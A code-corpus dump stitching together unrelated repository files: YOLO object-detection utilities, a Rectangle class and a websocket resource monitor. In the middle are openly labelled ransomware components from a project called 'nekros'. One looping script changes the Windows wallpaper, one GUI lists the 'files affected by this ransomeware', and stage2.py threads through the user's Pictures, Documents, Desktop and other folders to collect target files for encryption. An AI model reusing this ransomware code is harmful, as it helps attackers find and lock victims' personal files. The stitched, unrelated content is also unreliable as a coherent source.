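With `staircase=True`, the learning-rate schedule built in `train()` reduces to a simple closed form; the constants below are illustrative, not the project's `solver_params`:
```python
def staircase_lr(base_lr, step, decay_steps, decay_rate):
    # tf.train.exponential_decay(staircase=True):
    # lr = base_lr * decay_rate ** floor(step / decay_steps)
    return base_lr * decay_rate ** (step // decay_steps)

print(staircase_lr(1e-3, 2500, 1000, 0.9))  # 1e-3 * 0.9**2 = 8.1e-4
```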
#### File: YOLOv2/utils/dataset_utils.py
```python
import os
import sys
ros_path = '/opt/ros/kinetic/lib/python2.7/dist-packages'
if ros_path in sys.path:
sys.path.remove(ros_path)
import cv2
sys.path.append('/opt/ros/kinetic/lib/python2.7/dist-packages')
import numpy as np
import tensorflow as tf
from cfg.config import path_params
def total_sample(file_name):
sample_nums = 0
for record in tf.python_io.tf_record_iterator(file_name):
sample_nums += 1
return sample_nums
def create_trainval_txt(root_path):
data_path = os.path.join(root_path, 'images')
trainval = os.path.join(root_path, 'trainval.txt')
if os.path.exists(trainval):
os.remove(trainval)
file_obj = open(trainval, 'w', encoding='utf-8')
file_list = os.listdir(data_path)
for file in file_list:
filename = os.path.splitext(file)[0]
        file_obj.write(filename)
file_obj.write('\n')
file_obj.close()
def create_fddb_txt():
annotation_dir = "/home/chenwei/HDD/Project/datasets/object_detection/FDDB2016/FDDB-folds"
origin_image_dir = "/home/chenwei/HDD/Project/datasets/object_detection/FDDB2016/originalPics"
images_dir = "/home/chenwei/HDD/Project/datasets/object_detection/FDDB2016/convert/images"
labels_dir = "/home/chenwei/HDD/Project/datasets/object_detection/FDDB2016/convert/labels"
if not os.path.exists(annotation_dir):
os.mkdir(annotation_dir)
if not os.path.exists(labels_dir):
os.mkdir(labels_dir)
count = 1
for i in range(10):
annotation_path = os.path.join(annotation_dir, "FDDB-fold-%0*d-ellipseList.txt"%(2,i+1))
annotation_file = open(annotation_path)
while(True):
            # Check the raw line before appending ".jpg"; otherwise the
            # string is never falsy and the loop can't terminate cleanly.
            name_line = annotation_file.readline().rstrip()
            if not name_line:
                break
            filename = name_line + ".jpg"
line = annotation_file.readline()
if not line:
break
            face_num = int(line)
count += 1
image = cv2.imread(os.path.join(origin_image_dir, filename))
filename = filename.replace('/', '_')
cv2.imwrite(os.path.join(images_dir, filename), image)
label_path = labels_dir + "/" + filename.replace('/','_')[:-3] + "txt"
label_file = open(label_path, 'w')
for k in range(face_num):
                line = annotation_file.readline().strip().split()
                major_axis_radius = float(line[0])
                minor_axis_radius = float(line[1])
                angle = float(line[2])
                center_x = float(line[3])
                center_y = float(line[4])
                angle = angle / np.pi * 180
mask = np.zeros((image.shape[0], image.shape[1]), dtype=np.uint8)
                cv2.ellipse(mask, (int(center_x), int(center_y)), (int(major_axis_radius), int(minor_axis_radius)), angle, 0., 360., (255, 255, 255))
_, contours, hierarchy = cv2.findContours(mask, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)
for k in range(len(contours)):
r = cv2.boundingRect(contours[k])
xcenter = r[0] + r[2] / 2
ycenter = r[1] + r[3] / 2
labelline = "0" + " " + str(xcenter) + ' ' + str(ycenter) + ' ' + str(r[2]) + ' ' + str(r[3]) + '\n'
label_file.write(labelline)
label_file.close()
print(count)
if __name__ == '__main__':
#create_fddb_txt()
create_trainval_txt('/home/chenwei/HDD/Project/datasets/object_detection/FDDB2016/convert')
``` |
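`create_fddb_txt` rasterizes each ellipse into a mask and takes the contour's bounding rect; the same axis-aligned box can also be computed in closed form, sketched below (angle in radians):
```python
import numpy as np

def ellipse_to_bbox(cx, cy, major, minor, angle_rad):
    """Closed-form axis-aligned bbox of a rotated ellipse, as (x, y, w, h)."""
    half_w = np.sqrt((major * np.cos(angle_rad)) ** 2 + (minor * np.sin(angle_rad)) ** 2)
    half_h = np.sqrt((major * np.sin(angle_rad)) ** 2 + (minor * np.cos(angle_rad)) ** 2)
    return cx - half_w, cy - half_h, 2 * half_w, 2 * half_h
```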
{
"source": "530824679/YOLOv4",
"score": 3
} |
#### File: YOLOv4/model/ops.py
```python
import tensorflow as tf
def mish(inputs):
"""
mish activation function.
mish(x) = x * tanh(softplus(x)) = x * tanh(ln(1 + e^{x}))
:param inputs: inputs data
:return: same shape as the input.
"""
with tf.variable_scope('mish'):
return inputs * tf.math.tanh(tf.math.softplus(inputs))
def leaky_relu(inputs, alpha):
"""
leaky relu activation function.
    leaky_relu(x) = max(alpha * x, x), computed below as f1 * x + f2 * |x|
    :param inputs: inputs data
    :param alpha: slope applied to negative inputs
    :return: same shape as the input.
"""
with tf.variable_scope('leaky_relu'):
f1 = 0.5 * (1 + alpha)
f2 = 0.5 * (1 - alpha)
return f1 * inputs + f2 * tf.abs(inputs)
def conv2d(inputs, filters_shape, trainable, downsample=False, activate='mish', bn=True, scope='conv2d'):
with tf.variable_scope(scope):
if downsample:
pad_h, pad_w = (filters_shape[0] - 2) // 2 + 1, (filters_shape[1] - 2) // 2 + 1
paddings = tf.constant([[0, 0], [pad_h, pad_h], [pad_w, pad_w], [0, 0]])
input_data = tf.pad(inputs, paddings, 'CONSTANT')
strides = (1, 2, 2, 1)
padding = 'VALID'
else:
strides = (1, 1, 1, 1)
padding = "SAME"
input_data = inputs
weight = tf.get_variable(name='weight', dtype=tf.float32, trainable=True, shape=filters_shape, initializer=tf.random_normal_initializer(stddev=0.01))
conv = tf.nn.conv2d(input=input_data, filter=weight, strides=strides, padding=padding, name=scope)
if bn:
conv = tf.layers.batch_normalization(conv, beta_initializer=tf.zeros_initializer(),
gamma_initializer=tf.ones_initializer(),
moving_mean_initializer=tf.zeros_initializer(),
moving_variance_initializer=tf.ones_initializer(), training=trainable)
else:
bias = tf.get_variable(name='bias', shape=filters_shape[-1], trainable=True, dtype=tf.float32, initializer=tf.constant_initializer(0.0))
conv = tf.nn.bias_add(conv, bias)
        if activate == 'leaky':
            conv = leaky_relu(conv, alpha=0.1)
        elif activate == 'mish':
            conv = mish(conv)
        return conv
def csp_block(inputs, trans_channels, res_channels, left_channels, right_channels, output_channels, iter_num, trainable, scope):
input_channels = inputs.get_shape().as_list()[3]
concat_channels = left_channels + right_channels
with tf.variable_scope(scope):
inputs_data = conv2d(inputs, filters_shape=(3, 3, input_channels, trans_channels), trainable=trainable, downsample=True, scope='in_conv')
short_cut = inputs_data
residual = residual_block(inputs_data, res_channels, iter_num, trainable, scope='residual_block')
inputs_left = conv2d(residual, filters_shape=(1, 1, res_channels, left_channels), trainable=trainable, scope='left_conv')
inputs_right = conv2d(short_cut, filters_shape=(1, 1, trans_channels, right_channels), trainable=trainable, scope='right_conv')
outputs = route(inputs_left, inputs_right, scope='concat')
outputs = conv2d(outputs, filters_shape=(1, 1, concat_channels, output_channels), trainable=trainable, scope='output_conv')
return outputs
def residual_block(inputs, output_channels, iter_num, trainable, scope):
input_channels = inputs.get_shape().as_list()[3]
with tf.variable_scope(scope):
inputs = conv2d(inputs, filters_shape=(1, 1, input_channels, output_channels), trainable=trainable, scope='conv')
short_cut = inputs
for i in range(iter_num):
inputs_data = conv2d(inputs, filters_shape=(1, 1, output_channels, output_channels), trainable=trainable, scope='conv_1_'+str(i))
inputs_data = conv2d(inputs_data, filters_shape=(3, 3, output_channels, output_channels), trainable=trainable, scope='conv_2_'+str(i))
outputs = tf.add(inputs_data, short_cut)
return outputs
def spp_block(inputs, filter_num1=512, filter_num2=1024, trainable=True, scope='spp_block'):
input_channels = inputs.get_shape().as_list()[3]
with tf.variable_scope(scope):
inputs_data = conv2d(inputs, filters_shape=(1, 1, input_channels, filter_num1), trainable=trainable, activate='leaky', scope='conv_1')
inputs_data = conv2d(inputs_data, filters_shape=(3, 3, filter_num1, filter_num2), trainable=trainable, activate='leaky', scope='conv_2')
inputs_data = conv2d(inputs_data, filters_shape=(1, 1, filter_num2, filter_num1), trainable=trainable, activate='leaky', scope='conv_3')
spp = spatial_pyramid_pooling(inputs_data, 5, 9, 13, scope='spp')
inputs_data = conv2d(spp, filters_shape=(1, 1, filter_num1 * 4, filter_num1), trainable=trainable, activate='leaky',scope='conv_4')
inputs_data = conv2d(inputs_data, filters_shape=(3, 3, filter_num1, filter_num2), trainable=trainable, activate='leaky',scope='conv_5')
outputs = conv2d(inputs_data, filters_shape=(1, 1, filter_num2, filter_num1), trainable=trainable, activate='leaky',scope='conv_6')
return outputs
def spatial_pyramid_pooling(inputs, pool_size_1, pool_size_2, pool_size_3, scope):
with tf.variable_scope(scope):
pool_1 = maxpool(inputs, pool_size_1, stride=1, scope='pool_1')
pool_2 = maxpool(inputs, pool_size_2, stride=1, scope='pool_2')
pool_3 = maxpool(inputs, pool_size_3, stride=1, scope='pool_3')
outputs = tf.concat([pool_1, pool_2, pool_3, inputs], axis=-1)
return outputs
def maxpool(inputs, size=2, stride=2, scope='maxpool'):
with tf.variable_scope(scope):
pool = tf.layers.max_pooling2d(inputs, pool_size=size, strides=stride, padding='SAME')
return pool
def route(previous_output, current_output, scope='concat'):
with tf.variable_scope(scope):
outputs = tf.concat([current_output, previous_output], axis=-1)
return outputs
def upsample_block(inputs_1, inputs_2, filter_num1, filter_num2, trainable=True, scope='upsample_block'):
input_channels_1 = inputs_1.get_shape().as_list()[3]
input_channels_2 = inputs_2.get_shape().as_list()[3]
input_channels = filter_num1 + filter_num1
with tf.variable_scope(scope):
inputs_data_1 = conv2d(inputs_1, filters_shape=(1, 1, input_channels_1, filter_num1), trainable=trainable, activate='leaky', scope='conv_1')
inputs_data_2 = conv2d(inputs_2, filters_shape=(1, 1, input_channels_2, filter_num1), trainable=trainable, activate='leaky', scope='conv_2')
inputs_data_2 = upsample(inputs_data_2, "resize")
inputs_data = route(inputs_data_1, inputs_data_2)
inputs_data = conv2d(inputs_data, filters_shape=(1, 1, input_channels, filter_num1), trainable=trainable, activate='leaky', scope='conv_3')
inputs_data = conv2d(inputs_data, filters_shape=(3, 3, filter_num1, filter_num2), trainable=trainable, activate='leaky', scope='conv_4')
inputs_data = conv2d(inputs_data, filters_shape=(1, 1, filter_num2, filter_num1), trainable=trainable, activate='leaky', scope='conv_5')
inputs_data = conv2d(inputs_data, filters_shape=(3, 3, filter_num1, filter_num2), trainable=trainable, activate='leaky', scope='conv_6')
outputs = conv2d(inputs_data, filters_shape=(1, 1, filter_num2, filter_num1), trainable=trainable, activate='leaky', scope='conv_7')
return outputs
def upsample(inputs, method="deconv", scope="upsample"):
assert method in ["resize", "deconv"]
if method == "resize":
with tf.variable_scope(scope):
input_shape = tf.shape(inputs)
outputs = tf.image.resize_nearest_neighbor(inputs, (input_shape[1] * 2, input_shape[2] * 2))
if method == "deconv":
numm_filter = inputs.shape.as_list()[-1]
outputs = tf.layers.conv2d_transpose(inputs, numm_filter, kernel_size=2, padding='same', strides=(2,2), kernel_initializer=tf.random_normal_initializer())
return outputs
def downsample_block(inputs_1, inputs_2, filter_num1, filter_num2, trainable=True, scope='downsample_block'):
input_channels_1 = inputs_1.get_shape().as_list()[3]
input_channels_2 = inputs_2.get_shape().as_list()[3]
input_channels = filter_num1 + input_channels_2
with tf.variable_scope(scope):
inputs_data_1 = conv2d(inputs_1, filters_shape=(3, 3, input_channels_1, filter_num1), trainable=trainable, downsample=True, activate='leaky', scope='conv_1')
inputs_data = route(inputs_data_1, inputs_2)
inputs_data = conv2d(inputs_data, filters_shape=(1, 1, input_channels, filter_num1), trainable=trainable, activate='leaky', scope='conv_2')
inputs_data = conv2d(inputs_data, filters_shape=(3, 3, filter_num1, filter_num2), trainable=trainable, activate='leaky', scope='conv_3')
inputs_data = conv2d(inputs_data, filters_shape=(1, 1, filter_num2, filter_num1), trainable=trainable, activate='leaky', scope='conv_4')
inputs_data = conv2d(inputs_data, filters_shape=(3, 3, filter_num1, filter_num2), trainable=trainable, activate='leaky', scope='conv_5')
outputs = conv2d(inputs_data, filters_shape=(1, 1, filter_num2, filter_num1), trainable=trainable, activate='leaky', scope='conv_6')
return outputs
```
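A small numpy check of the two activations defined in ops.py; the leaky form `f1*x + f2*|x|` is algebraically identical to `max(alpha*x, x)`:
```python
import numpy as np

x = np.array([-2.0, -0.5, 0.0, 1.5])
mish = x * np.tanh(np.log1p(np.exp(x)))            # x * tanh(softplus(x))
alpha = 0.1
f1, f2 = 0.5 * (1 + alpha), 0.5 * (1 - alpha)
leaky = f1 * x + f2 * np.abs(x)
assert np.allclose(leaky, np.maximum(alpha * x, x))
print(mish, leaky)
```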
#### File: YOLOv4/utils/visualize.py
```python
import cv2
import numpy as np
def calculate_angle(im, re):
"""
    param: im(float): imaginary part of the complex number
    param: re(float): real part of the complex number
return: The angle at which the objects rotate
around the Z axis in the lidar coordinate system
"""
if re > 0:
return np.arctan(im / re)
elif im < 0:
return -np.pi + np.arctan(im / re)
else:
return np.pi + np.arctan(im / re)
def draw_rotated_box(img, cy, cx, w, h, angle, color):
"""
param: img(array): RGB image
param: cy(int, float): Here cy is cx in the image coordinate system
param: cx(int, float): Here cx is cy in the image coordinate system
param: w(int, float): box's width
param: h(int, float): box's height
param: angle(float): rz
param: color(tuple, list): the color of box, (R, G, B)
"""
    left = int(cy - w / 2)
    top = int(cx - h / 2)
ro = np.sqrt(pow(left - cy, 2) + pow(top - cx, 2))
a1 = np.arctan((w / 2) / (h / 2))
a2 = -np.arctan((w / 2) / (h / 2))
a3 = -np.pi + a1
a4 = np.pi - a1
rotated_p1_y = cy + int(ro * np.sin(angle + a1))
rotated_p1_x = cx + int(ro * np.cos(angle + a1))
rotated_p2_y = cy + int(ro * np.sin(angle + a2))
rotated_p2_x = cx + int(ro * np.cos(angle + a2))
rotated_p3_y = cy + int(ro * np.sin(angle + a3))
rotated_p3_x = cx + int(ro * np.cos(angle + a3))
rotated_p4_y = cy + int(ro * np.sin(angle + a4))
rotated_p4_x = cx + int(ro * np.cos(angle + a4))
center_p1p2y = int((rotated_p1_y + rotated_p2_y) * 0.5)
center_p1p2x = int((rotated_p1_x + rotated_p2_x) * 0.5)
cv2.line(img, (rotated_p1_y, rotated_p1_x), (rotated_p2_y, rotated_p2_x),
color, 1)
cv2.line(img, (rotated_p2_y, rotated_p2_x), (rotated_p3_y, rotated_p3_x),
color, 1)
cv2.line(img, (rotated_p3_y, rotated_p3_x), (rotated_p4_y, rotated_p4_x),
color, 1)
cv2.line(img, (rotated_p4_y, rotated_p4_x), (rotated_p1_y, rotated_p1_x),
color, 1)
cv2.line(img, (center_p1p2y, center_p1p2x), (cy, cx), color, 1)
``` |
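Assuming `calculate_angle` from the module above is in scope, it agrees with `np.arctan2(im, re)` whenever `re != 0`; `arctan2` additionally avoids the division by zero at `re == 0`:
```python
import numpy as np

for im, re in [(1.0, 2.0), (-1.0, -2.0), (1.0, -2.0), (-1.0, 2.0)]:
    assert np.isclose(calculate_angle(im, re), np.arctan2(im, re))
```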
{
"source": "530tatted530/nekros",
"score": 3
} |
#### File: Ransomeware/after_stage1/changeWallpaper.py
```python
import ctypes, os, time, random
#=================================================================#
# Author : <NAME> | Website : https://technowlogy.tk #
#+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++#
# Python Module to Change Windows Wallpaper in Every Given Time #
#+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++#
# Mainly Developed for Open-Source Ransomeware project #
#=================================================================#
class ChangeWallpaper:
def __init__(self, directory=None):
if directory == None:
self.directory = os.getcwd().replace("\\", "\\\\") + "\\\\"
self.path = ''
else:
self.directory = os.getcwd() + "\\" + directory
self.path = "./" + directory + "/"
def time_to_change_wallpaper(self, seconds=10):
"""
        Changes the wallpaper after every given interval, forever.
        :param seconds: interval between changes [in seconds]
"""
while True:
img_list = self.list_all_img()
img = self.random_img_selector(img_list)
self.change_wallpaper(self.path + img)
print(f"[*] Changing wallpaper again after {seconds} Seconds")
time.sleep(seconds)
def locate_images(self):
list_of_all_files = []
for root, _, files in os.walk(self.directory):
for f in files:
list_of_all_files.append(f)
return list_of_all_files
def list_all_img(self):
"""Function to return a list of image file in current working direcotry"""
img_list = []
img_extension = ['jpg', 'jpeg', 'png']
file_list = self.locate_images()
        for img in file_list:
            # Compare the real extension; the original 3-character slice
            # could never match 'jpeg'.
            ext = os.path.splitext(img)[1].lstrip('.').lower()
            if ext in img_extension:
                img_list.append(img)
return img_list
def random_img_selector(self, img):
"""Selects random Image from a given Image List"""
img_list = img
total_files = len(img_list)
random_number = random.randint(0, total_files-1)
img_selected = img[random_number]
return img_selected
def change_wallpaper(self, img):
"""
        Change the wallpaper [MAIN function]
        :param img: image path relative to the working directory
"""
img_path = os.getcwd() + "\\" +img
print("\n[*] Changing Wallpaper ...")
ctypes.windll.user32.SystemParametersInfoW(20, 0, img_path, 0)
print("[+] Wallpaper Changed Successfully!")
if __name__ == '__main__':
change_wallpaper = ChangeWallpaper()
change_wallpaper.time_to_change_wallpaper(10)
```
#### File: Ransomeware/after_stage2/check_log_gui.py
```python
import sys
try:
import Tkinter as tk
from Tkinter import messagebox
except ImportError:
import tkinter as tk
from tkinter import messagebox
try:
import ttk
py3 = False
except ImportError:
import tkinter.ttk as ttk
py3 = True
from PIL import Image, ImageTk
import os
def start_gui():
'''Starting point when module is the main routine.'''
global prog_location, root
prog_call = sys.argv[0]
prog_location = os.path.split(prog_call)[0]
root = tk.Toplevel()
top = CheckLog(root)
top.add_log_data_to_listbox()
root.mainloop()
def destroy_this_window():
global root
root.destroy()
class CheckLog:
def __init__(self, top=None):
'''This class configures and populates the toplevel window.
top is the toplevel containing window.'''
_bgcolor = '#d9d9d9' # X11 color: 'gray85'
_fgcolor = '#000000' # X11 color: 'black'
_compcolor = '#d9d9d9' # X11 color: 'gray85'
_ana1color = '#d9d9d9' # X11 color: 'gray85'
_ana2color = '#ececec' # Closest X11 color: 'gray92'
font10 = "-family {Segoe UI} -size 14 -weight bold -slant " \
"roman -underline 0 -overstrike 0"
self.style = ttk.Style()
if sys.platform == "win32":
self.style.theme_use('winnative')
self.style.configure('.',background=_bgcolor)
self.style.configure('.',foreground=_fgcolor)
self.style.map('.',background=
[('selected', _compcolor), ('active',_ana2color)])
top.geometry("600x450+413+160")
icon_location = ImageTk.PhotoImage(file=os.path.join(prog_location,"img/lock.ico"))
top.tk.call('wm', 'iconphoto', top._w, icon_location)
top.resizable(0, 0)
top.title("Check Encrypted Files Log Window")
top.configure(background="#ff0000")
self.Scrolledlistbox1 = ScrolledListBox(top)
self.Scrolledlistbox1.place(relx=0.012, rely=0.111, relheight=0.878
, relwidth=0.968)
self.Scrolledlistbox1.configure(background="white")
self.Scrolledlistbox1.configure(disabledforeground="#a3a3a3")
self.Scrolledlistbox1.configure(font="TkFixedFont")
self.Scrolledlistbox1.configure(foreground="black")
self.Scrolledlistbox1.configure(highlightbackground="#d9d9d9")
self.Scrolledlistbox1.configure(highlightcolor="#d9d9d9")
self.Scrolledlistbox1.configure(selectbackground="#c4c4c4")
self.Scrolledlistbox1.configure(selectforeground="black")
self.Label1 = tk.Label(top)
self.Label1.place(relx=0.008, rely=0.011, height=41, width=584)
self.Label1.configure(background="#ff0000")
self.Label1.configure(disabledforeground="#a3a3a3")
self.Label1.configure(font=font10)
self.Label1.configure(foreground="#ffff79")
self.Label1.configure(text='''These Are The Files Which Are Affected By This Ransomeware!!!''')
def add_log_data_to_listbox(self):
log_list = []
try:
with open('log.txt', 'r') as f:
for file in f.readlines():
log_list.append(file)
except Exception:
destroy_this_window()
messagebox.showerror('404 File Not Found : (', 'You Might Deleted \"log.txt\", which contains\nlist of files which gets encrypted!')
for file in log_list:
self.Scrolledlistbox1.insert(tk.END, file)
# The following code is added to facilitate the Scrolled widgets
class AutoScroll(object):
'''Configure the scrollbars for a widget.'''
def __init__(self, master):
try:
vsb = ttk.Scrollbar(master, orient='vertical', command=self.yview)
except:
pass
hsb = ttk.Scrollbar(master, orient='horizontal', command=self.xview)
try:
self.configure(yscrollcommand=self._autoscroll(vsb))
except:
pass
self.configure(xscrollcommand=self._autoscroll(hsb))
self.grid(column=0, row=0, sticky='nsew')
try:
vsb.grid(column=1, row=0, sticky='ns')
except:
pass
hsb.grid(column=0, row=1, sticky='ew')
master.grid_columnconfigure(0, weight=1)
master.grid_rowconfigure(0, weight=1)
if py3:
methods = tk.Pack.__dict__.keys() | tk.Grid.__dict__.keys() \
| tk.Place.__dict__.keys()
else:
methods = tk.Pack.__dict__.keys() + tk.Grid.__dict__.keys() \
+ tk.Place.__dict__.keys()
for meth in methods:
if meth[0] != '_' and meth not in ('config', 'configure'):
setattr(self, meth, getattr(master, meth))
@staticmethod
def _autoscroll(sbar):
'''Hide and show scrollbar as needed.'''
def wrapped(first, last):
first, last = float(first), float(last)
if first <= 0 and last >= 1:
sbar.grid_remove()
else:
sbar.grid()
sbar.set(first, last)
return wrapped
def __str__(self):
return str(self.master)
def _create_container(func):
'''Creates a ttk Frame with a given master, and use this new frame to
place the scrollbars and the widget.'''
def wrapped(cls, master, **kw):
container = ttk.Frame(master)
container.bind('<Enter>', lambda e: _bound_to_mousewheel(e, container))
container.bind('<Leave>', lambda e: _unbound_to_mousewheel(e, container))
return func(cls, container, **kw)
return wrapped
class ScrolledListBox(AutoScroll, tk.Listbox):
'''A standard Tkinter Listbox widget with scrollbars that will
automatically show/hide as needed.'''
@_create_container
def __init__(self, master, **kw):
tk.Listbox.__init__(self, master, **kw)
AutoScroll.__init__(self, master)
def size_(self):
sz = tk.Listbox.size(self)
return sz
import platform
def _bound_to_mousewheel(event, widget):
child = widget.winfo_children()[0]
if platform.system() == 'Windows' or platform.system() == 'Darwin':
child.bind_all('<MouseWheel>', lambda e: _on_mousewheel(e, child))
child.bind_all('<Shift-MouseWheel>', lambda e: _on_shiftmouse(e, child))
else:
child.bind_all('<Button-4>', lambda e: _on_mousewheel(e, child))
child.bind_all('<Button-5>', lambda e: _on_mousewheel(e, child))
child.bind_all('<Shift-Button-4>', lambda e: _on_shiftmouse(e, child))
child.bind_all('<Shift-Button-5>', lambda e: _on_shiftmouse(e, child))
def _unbound_to_mousewheel(event, widget):
if platform.system() == 'Windows' or platform.system() == 'Darwin':
widget.unbind_all('<MouseWheel>')
widget.unbind_all('<Shift-MouseWheel>')
else:
widget.unbind_all('<Button-4>')
widget.unbind_all('<Button-5>')
widget.unbind_all('<Shift-Button-4>')
widget.unbind_all('<Shift-Button-5>')
def _on_mousewheel(event, widget):
if platform.system() == 'Windows':
widget.yview_scroll(-1*int(event.delta/120),'units')
elif platform.system() == 'Darwin':
widget.yview_scroll(-1*int(event.delta),'units')
else:
if event.num == 4:
widget.yview_scroll(-1, 'units')
elif event.num == 5:
widget.yview_scroll(1, 'units')
def _on_shiftmouse(event, widget):
if platform.system() == 'Windows':
widget.xview_scroll(-1*int(event.delta/120), 'units')
elif platform.system() == 'Darwin':
widget.xview_scroll(-1*int(event.delta), 'units')
else:
if event.num == 4:
widget.xview_scroll(-1, 'units')
elif event.num == 5:
widget.xview_scroll(1, 'units')
if __name__ == '__main__':
start_gui()
```
#### File: nekros/Ransomeware/stage2.py
```python
import os, time
import threading #Using Threads to Boost Search Process BY Searching Diff. Drive on Diff. Thread
from os.path import expanduser
from pathlib import Path #Used to Find the Home Path
import configparser, ast #Used to Retrive Settings from config.txt
#Stage2 is Initiated By (Stage2 Class), which depends on (LocateTargetFiles Class)
class Stage2:
def __init__(self):
self.list_of_files = []
def start(self):
home = self.get_home_dir()
target1 = home + "Pictures"
target2 = home + "Music"
target3 = home + "Downloads"
target4 = home + "Documents"
target5 = home + "Desktop"
        # Start all threads first, then join, so the five directories are
        # actually searched in parallel (start()/join() pairs would serialize them).
        threads = [threading.Thread(target=self.run_locate_class, args=[target])
                   for target in (target1, target2, target3, target4, target5)]
        for t in threads:
            t.start()
        for t in threads:
            t.join()
with open('log.txt' , 'w') as f:
for files in self.list_of_files:
f.write(files+'\n')
return self.list_of_files
def get_home_dir(self):
return str(Path.home()) + '\\'
def run_locate_class(self, drive_name):
'''
Function to make Object of LocateTargetFiles Class
'''
starting = LocateTargetFiles()
list_of_files = starting.start(drive_name)
self.list_of_files.extend(list_of_files)
return True
class LocateTargetFiles:
def __init__(self, exclude = None):
self.files_on_system = []
config = configparser.RawConfigParser()
config.read('config.txt')
self.target_extension = ast.literal_eval(config.get("TARGET_EXTENSIONS", "list1")) #Retriving From config.txt
self.exclude_dir = ast.literal_eval(config.get("EXCLUDED_DIRECTORY", "list1")) #Retriving From config.txt
if exclude != None:
self.exclude_dir.extend(exclude)
def start(self, root_dir):
self.locate_files(root_dir)
return self.files_on_system
def locate_files(self, root_dir):
for root, _, files in os.walk(root_dir):
for f in files:
abs_file_path = os.path.join(root, f)
self.filter(self.target_extension, abs_file_path)
def filter(self, target_extension, abs_file_path):
if self.is_excluded_dir(abs_file_path) == False:
# Filtering Files On the basics of file extension
if abs_file_path.split('.')[-1] in self.target_extension and abs_file_path.split('\\')[-1] != 'log.txt':
self.files_on_system.append(abs_file_path)
else:
pass
def is_excluded_dir(self, path):
'''
@summary: Checks whether the specified path should be excluded from encryption
@param path: The path to check
@return: True if the path should be excluded from encryption, otherwise False
'''
for dir_to_exclude in self.exclude_dir:
            length = len(dir_to_exclude)
            if path[:length] == dir_to_exclude:
return True
return False
if __name__ == '__main__':
test = Stage2()
list_of_files = test.start()
print(f"[+] Total Number of Files : {len(list_of_files)}\n")
time.sleep(4)
for file in list_of_files:
print(file)
'''
#Testing Class == LocateTargetFiles
absolue_path = input("Enter Absolute Path : ")
exclude_dir = ['C:\\Users\\sat<NAME>\\Desktop\\Ransomeware\\2',]
test = LocateTargetFiles(exclude_dir)
files_on_system = test.start(absolue_path)
for file in files_on_system:
print(file)
'''
``` |
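A hypothetical `config.txt` matching the keys `LocateTargetFiles` reads above (`TARGET_EXTENSIONS` and `EXCLUDED_DIRECTORY`, each with a `list1` entry parsed via `ast.literal_eval`):
```python
import ast
import configparser

sample = r"""
[TARGET_EXTENSIONS]
list1 = ['txt', 'jpg', 'png', 'docx']

[EXCLUDED_DIRECTORY]
list1 = ['C:\\Windows', 'C:\\Program Files']
"""
config = configparser.RawConfigParser()
config.read_string(sample)
print(ast.literal_eval(config.get("TARGET_EXTENSIONS", "list1")))
# ['txt', 'jpg', 'png', 'docx']
```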
{
"source": "531464049/PythonLearning",
"score": 3
} |
#### File: PythonLearning/test/Rectangle.py
```python
class Rectangle(object):
def __init__(self):
self.width = 0
self.height = 0
def set_size(self, size):
self.width, self.height = size
def get_size(self):
return self.width, self.height
size = property(get_size, set_size)
``` |
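A brief usage sketch of the `size` property defined above:
```python
r = Rectangle()
r.size = (10, 5)            # routed through set_size
print(r.size)               # (10, 5), via get_size
print(r.width, r.height)    # 10 5
```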
{
"source": "534ttl3/ctsutils",
"score": 3
} |
#### File: ctsutils/ctsutils/euler_angles.py
```python
import math
import numpy as np
# ---- convention for accessing all 4 pi sr by just two angles, theta and phi ----
def gamma_convention():
return 0
def beta_convention(theta):
return -np.pi/2 + theta # theta \in [0, pi]
def alpha_convention(phi):
return phi # phi \in [0, 2*pi]
# ----
def get_zxz_rot(alpha, beta, gamma):
"""
    calculate the active rotation R_z(alpha) @ R_x(beta) @ R_z(gamma).
    Applied to a column vector, R_z(gamma) acts first and R_z(alpha) last,
    i.e. the rotations are applied in reverse argument order.
"""
return np.einsum("ij,jk",
np.einsum("ij,jk", get_R_z(alpha), get_R_x(beta)),
get_R_z(gamma))
# return np.dot(get_R_x(beta), get_R_z(alpha))
# return np.dot(get_R_z(gamma), np.dot(get_R_x(beta), get_R_z(alpha))) # this produces the wrong result
# return np.einsum("ij,jk,kl", get_R_z(alpha), get_R_x(beta), get_R_z(gamma))
def get_R_x(angle):
return np.array([[1, 0, 0],
[0, math.cos(angle), -math.sin(angle)],
[0, math.sin(angle), math.cos(angle)]])
def get_R_y(angle):
return np.array([[math.cos(angle), 0, math.sin(angle)],
[0, 1, 0],
[-math.sin(angle), 0, math.cos(angle)]])
def get_R_z(angle):
return np.array([[math.cos(angle), -math.sin(angle), 0],
[math.sin(angle), math.cos(angle), 0],
[0, 0, 1]])
```
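Assuming the functions above are imported, a rotation built by `get_zxz_rot` should be orthogonal with determinant +1; the angles are illustrative:
```python
import numpy as np

R = get_zxz_rot(alpha_convention(0.3), beta_convention(1.1), gamma_convention())
assert np.allclose(R @ R.T, np.eye(3))
assert np.isclose(np.linalg.det(R), 1.0)
```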
#### File: ctsutils/ctsutils/mpl_slider_pcolor.py
```python
import numpy as np
import matplotlib.pyplot as plt
from matplotlib.widgets import Slider, Button, RadioButtons
fig, ax = plt.subplots()
plt.subplots_adjust(left=0.25, bottom=0.25)
x = np.linspace(-3, 3, 51)
y = np.linspace(-2, 2, 41)
y2 = np.linspace(-1, 1, 31)
X, Y, Y2 = np.meshgrid(x, y, y2, indexing="ij")
Z = (1 - X/2 + X**5 + (Y+Y2)**3) * np.exp(-X**2 -
                                          (Y+Y2)**2)  # compute the array of Z values
plot = ax.pcolor(X[:, 5, :], Y2[:, 5, :], Z[:, 5, :] # , shading="auto"
)
axfreq = plt.axes([0.25, 0.1, 0.65, 0.03])
sfreq = Slider(axfreq, 'Slice', 0., 40., valinit=0., valstep=1.)  # y has 41 points, so valid slice indices are 0..40
def update(val):
print(val)
idx = int(val)
ax.pcolor(X[:, idx, :], Y2[:, idx, :], Z[:, idx, :] # , shading="auto"
)
sfreq.on_changed(update)
plt.show()
``` |
{
"source": "536/python-websocket-echarts-resource-monitor",
"score": 3
} |
#### File: 536/python-websocket-echarts-resource-monitor/server.py
```python
import asyncio
import json
import time
import psutil
import websockets
interval = 3 # update every 3s
async def analysis(websocket):
while websocket.open:
data = {
"code": 0,
"msg": "",
"result": {
"time": time.strftime('%M:%S'),
"memory": psutil.virtual_memory().percent,
"cpu": psutil.cpu_percent(),
}
}
print(data)
await websocket.send(json.dumps(data))
await asyncio.sleep(interval)
print('closed')
